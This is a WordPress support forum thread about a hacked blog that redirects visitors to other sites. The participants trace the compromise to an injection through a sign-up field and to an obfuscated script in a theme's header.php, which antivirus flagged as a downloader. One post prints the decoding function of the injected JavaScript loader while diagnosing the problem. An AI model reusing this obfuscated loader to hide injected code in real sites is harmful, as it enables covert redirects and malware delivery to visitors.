Blog is redirecting to malcious sites….

now it sent it to: https://www.yellowpages.com/name/new+york-ny/Carpet?From=MRCH2&search_terms=Carpet.

It seems to be random. It’s starting to annoy me.

It still does it… even after the update to 2.9.1

Start with a read at FAQ_My_site_was_hacked

It seems to be happening faster and faster….

What version were you on before 2.9.1? Was it doing it before the update and when did you update?

It sounds like you have fallen victim to a hack and had dodgy stuff inserted into your code.

In addition to the post mentioned above, look at this post:
https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
Then investigate the links on there especially this one:
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

Thanks.. will check that now.

-numeeja,

What version were you on before 2.9.1? Was it doing it before the update and when did you update?
= I was on 2.8.6. This issue was started yesterday as far as I can tell. I did the update about 30 minutes ago today.

It sounds like you have fallen victim to a hack and had dodgy stuff inserted into your code.

In addition to the post mentioned above, look at this post:
https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
Then investigate the links on there especially this one:
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

Will check these sites.

Thanks.

I’m Kujoe’s web guy before I start lol…

A user called HaiPaolucci69 signed up and used the ‘First Name’ field to inject some coding. This injected code seems to have given the user admin permissions. That account is now deleted along with the injected code. There is however some more coding throughout the site causing it to redirect to certain pages.

I found some coding by viewing source on the main page, its located after the end of the HEAD tag and before the beginning of the BODY tag… its slightly encoded to hide itself though. The important bit is “unescape” I think…. this is the first part of the decrypted coding:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

I dont know what the rest of the coding is encrypted in so I cant translate it. Anyway… unescape I think is the source of the redirect… BUT I can’t find where that script is in the PHP’s or the SQL. I’m hoping its PHP but since I dont know WP too well could someone suggest which PHP file it could be in, as I said the code is located after the end of the HEAD tag and before the beginning of the BODY tag on the main page.

Kujoe is currently uploading a fresh copy of the latest version in hopes of eradicating this, but due to the amount of data in the SQL’s we’re trying to keep the SQL and just upload a fresh site… so hopefully we don’t have to delete the SQL.

WordPress injection attack and “affiliate ping-pong”
Sophos

Issue solved… I found the injected coding in wp-content/themes/bfa-round-tabs-10/header.php

It was a script in-between the end HEAD tag and the beginning BODY tag.

All looks like its working fine now and its no longer trying to connect or redirect to any website.

Thanks Trayner for the useful link, it was the exact same issue… although I fixed it before I read it lol, but at least I know the in’s and out’s of the issue now =p

I have been on 2.9.1 since it was released and just today my site began redirecting. It was the same code in the same place. I had 1 unauthorized user created as Admin. AVG recognized the header.php file as JS/Downloader.Agent when I downloaded it. User is gone, script is gone, but how do we prevent this in the future?